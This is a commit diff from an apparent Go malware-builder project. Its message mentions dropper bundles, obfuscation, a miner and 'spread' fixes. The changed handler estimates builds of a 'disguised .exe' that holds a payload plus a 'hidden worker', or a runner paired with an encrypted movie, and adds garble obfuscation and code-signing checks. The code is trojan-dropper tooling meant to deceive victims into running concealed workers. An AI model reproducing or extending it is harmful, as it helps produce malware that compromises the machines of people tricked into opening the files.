fix: 2026-06-04 audit pass — README, USB pack, multi-area fixes
WS ticket dashboard auth, builder universal signing/size limits/fusion obfuscation/dropper bundles, Path Tracer WireGuard topology, SessionGate degraded mode and download timeouts, server bootstrap (data dir, cloudflared dedupe, config port precedence), agent mesh/miner/spread fixes. README refreshed; usb bundle repacked; PROBLEMS.md audit log updated.
This commit is contained in:
@@ -55,24 +55,20 @@ func (h *Handler) estimateFusionBuild(req *BuildRequest, prepPath string, prepSi
|
||||
workerBytes := h.estimateWorkerBytes()
|
||||
stubBytes := defaultFusionStubBytes
|
||||
var total int64
|
||||
switch kind {
|
||||
case "video":
|
||||
if mode == "embedded" {
|
||||
total = prepSize + workerBytes + stubBytes + resourcePatchOverhead
|
||||
} else {
|
||||
total = workerBytes + stubBytes + resourcePatchOverhead
|
||||
}
|
||||
default:
|
||||
if mode == "embedded" {
|
||||
total = prepSize + workerBytes + stubBytes + resourcePatchOverhead
|
||||
} else {
|
||||
// paired: payload ships beside the runner, not inside the .exe
|
||||
total = workerBytes + stubBytes + resourcePatchOverhead
|
||||
}
|
||||
|
||||
root := h.projectRoot
|
||||
if root == "" || root == "." {
|
||||
root, _ = filepath.Abs(".")
|
||||
}
|
||||
label := prepName
|
||||
if kind != "video" {
|
||||
label = strings.TrimSuffix(outputName, filepath.Ext(outputName))
|
||||
label := strings.TrimSuffix(outputName, filepath.Ext(outputName))
|
||||
if label == "" {
|
||||
label = prepName
|
||||
}
|
||||
sub := fusionExportSubdir(req, label)
|
||||
projectOut := filepath.Join(root, FusionDeliverablesDir, sub, outputName)
|
||||
@@ -90,27 +86,25 @@ func (h *Handler) estimateFusionBuild(req *BuildRequest, prepPath string, prepSi
|
||||
Obfuscate: h.shouldObfuscate(req),
|
||||
SignBuild: req.SignBuild,
|
||||
Notes: []string{
|
||||
fmt.Sprintf("Payload: %s (%s)", prepName, formatBytes(prepSize)),
|
||||
fmt.Sprintf("Payload: %s [%s] (%s)", prepName, kind, formatBytes(prepSize)),
|
||||
fmt.Sprintf("Estimated worker: %s", formatBytes(workerBytes)),
|
||||
fmt.Sprintf("Fusion launcher overhead: ~%s", formatBytes(stubBytes)),
|
||||
fmt.Sprintf("Max upload: %s", formatBytes(FusionMaxUploadBytes)),
|
||||
},
|
||||
}
|
||||
|
||||
if kind == "video" {
|
||||
if mode == "embedded" {
|
||||
resp.Notes = append(resp.Notes,
|
||||
"Option A (embedded): one disguised .exe contains the movie + hidden worker. Best under ~500MB.",
|
||||
)
|
||||
} else {
|
||||
resp.Notes = append(resp.Notes,
|
||||
"Option B (paired): runner .exe + encrypted movie in fusion-deliverables/<title>/.",
|
||||
fmt.Sprintf("Movie file stays as %q beside the runner.", prepName),
|
||||
)
|
||||
}
|
||||
resp.ExportPath = filepath.Join(root, FusionDeliverablesDir, sub)
|
||||
resp.Notes = append(resp.Notes, fmt.Sprintf("Deliverables folder: %s", resp.ExportPath))
|
||||
if mode == "embedded" {
|
||||
resp.Notes = append(resp.Notes,
|
||||
"Embedded mode: one disguised .exe contains the payload + hidden worker. Best under ~500MB.",
|
||||
)
|
||||
} else {
|
||||
resp.Notes = append(resp.Notes,
|
||||
"Paired mode: runner .exe + payload file in fusion-deliverables/<title>/.",
|
||||
fmt.Sprintf("Payload file stays as %q beside the runner.", prepName),
|
||||
)
|
||||
}
|
||||
resp.ExportPath = filepath.Join(root, FusionDeliverablesDir, sub)
|
||||
resp.Notes = append(resp.Notes, fmt.Sprintf("Deliverables folder: %s", resp.ExportPath))
|
||||
|
||||
if strings.TrimSpace(req.OutputDir) != "" {
|
||||
clean := filepath.Clean(strings.TrimSpace(req.OutputDir))
|
||||
@@ -126,8 +120,12 @@ func (h *Handler) estimateFusionBuild(req *BuildRequest, prepPath string, prepSi
|
||||
if h.shouldObfuscate(req) && h.garblePath == "" {
|
||||
resp.Notes = append(resp.Notes, "Garble not found — obfuscation will be skipped unless you install garble (devrun.bat installs it).")
|
||||
}
|
||||
if req.SignBuild && (!h.policy.Sign.Enabled || strings.TrimSpace(h.policy.Sign.CertThumbprint) == "") {
|
||||
resp.Notes = append(resp.Notes, "Code signing requested but Calibrate has no certificate thumbprint configured.")
|
||||
if req.SignBuild {
|
||||
if !h.policy.Sign.Enabled || strings.TrimSpace(h.policy.Sign.CertThumbprint) == "" {
|
||||
resp.Notes = append(resp.Notes, "Code signing requested but Calibrate has no certificate thumbprint configured.")
|
||||
} else if !h.signingToolAvailable() {
|
||||
resp.Notes = append(resp.Notes, signingToolMissingNote())
|
||||
}
|
||||
}
|
||||
|
||||
return resp
|
||||
|
||||
Reference in New Issue
Block a user